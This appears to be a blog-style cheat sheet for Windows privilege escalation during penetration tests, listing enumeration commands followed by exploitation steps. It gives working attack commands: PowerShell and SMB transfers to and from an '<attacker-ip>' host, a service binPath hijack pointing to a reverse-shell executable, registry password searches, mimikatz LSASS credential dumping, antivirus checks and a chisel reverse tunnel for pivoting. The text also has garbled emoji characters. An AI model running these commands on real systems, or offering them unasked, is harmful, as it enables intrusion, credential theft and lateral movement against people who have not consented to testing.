
Privilege escalation is a critical phase in penetration testing and Windows post-exploitation. Once an attacker gains a foothold on a machine, escalating privileges to Administrator or SYSTEM can unlock deeper access and lateral movement across the network. This cheatsheet provides a structured step-by-step guide to enumeration, exploiting misconfigurations, credentials dumping, service abuse, registry exploitation, and more!
Letβs escalate to SYSTEM! π΄ββ οΈ
β
1οΈβ£ General Enumeration - Who Am I?
Basic User Information
whoami /all
echo %USERNAME%
whoami /groups
Do I Have Anything Fun? (Privileges Check)
whoami /priv
net user <username>
Look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, etc. π¨
β
2οΈβ£ Where Am I? (System Info)
systeminfo
hostname
Look for hotfixes, outdated versions, and patch levels!
β
3οΈβ£ Anyone Home? (Users & Groups)
net users
net localgroup administrators
Check Logged-In Users
query user
β
4οΈβ£ What Am I Part Of? (Domain Enumeration)
whoami /groups
net group "Domain Admins" /domain
β
5οΈβ£ What Is This Place? (System & Installed Software Info)
wmic product get name,version,vendor
Look for outdated software for exploits.
β
6οΈβ£ Is It Fancy? (Checking System Integrity)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Look for Windows version for kernel exploits.
β
7οΈβ£ Am I Tied Up? (Restrictions & Policies)
gpresult /z
Look for GPO restrictions that may prevent actions.
β
8οΈβ£ Anything Reachable? (Network Info & Open Ports)
ipconfig /all
netstat -ano
Check for open ports, firewall rules, or RDP access.
β
9οΈβ£ What Does The Inside Look Like? (Processes & Services)
tasklist /v
wmic service get name,displayname,pathname,startmode
Look for misconfigured services and exploitable binaries.
β
π Leave Me Alone! (Defender & AV Checks)
sc query windefend
wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayName
Look for Windows Defender or AV software that might block your attacks.
β
π οΈ Exploitation Techniques π
πΉ File Transfer - Upload/Download Files
Using SMB
copy file.exe \\<attacker-ip>\share
Using PowerShell
(New-Object System.Net.WebClient).DownloadFile("http://<attacker-ip>/file.exe", "C:\Users\Public\file.exe")
β
πΉ Automated Enumeration - WinPEAS & More
WinPEAS (Privilege Escalation Automated Scanner)
.\winPEASany.exe
PowerUp - Automated PrivEsc Finder
Import-Module .\PowerUp.ps1
Invoke-AllChecks
β
πΉ Hacking the Services (Service Misconfiguration)
Checking Access using Accesschk.exe
accesschk.exe -uwcqv "Authenticated Users" *
Getting ACLs
icacls "C:\Program Files\VulnerableService"
Exploiting Services - sc.exe
sc config <ServiceName> binPath= "C:\Attack\reverse-shell.exe"
sc start <ServiceName>
β
πΉ Registry Exploitation (Stored Passwords & Secrets)
Finding Credentials in Registry
reg query HKLM /f password /t REG_SZ /s
β
πΉ Credentials or Hashes (Extracting & Using Credentials)
Extracting Credentials from LSASS
mimikatz.exe
sekurlsa::logonpasswords
RunAs - Running Programs as Another User
runas /user:Administrator cmd.exe
β
πΉ Find Files Fast (Hunting for Sensitive Files)
dir /s /b *password*.*
β
πΉ Port Forwarding (Pivoting & Lateral Movement)
Using Chisel
chisel client <attacker-ip>:8080 R:9999:127.0.0.1:3389
Use it to tunnel RDP, SSH, or SMB through firewalls.
β
π₯ Final Thoughts
Mastering Windows Privilege Escalation requires practice. Focus on enumeration, misconfigurations, credentials, services, registry, and network pivoting.
π βTry Harderβ and Hack Like a Pro!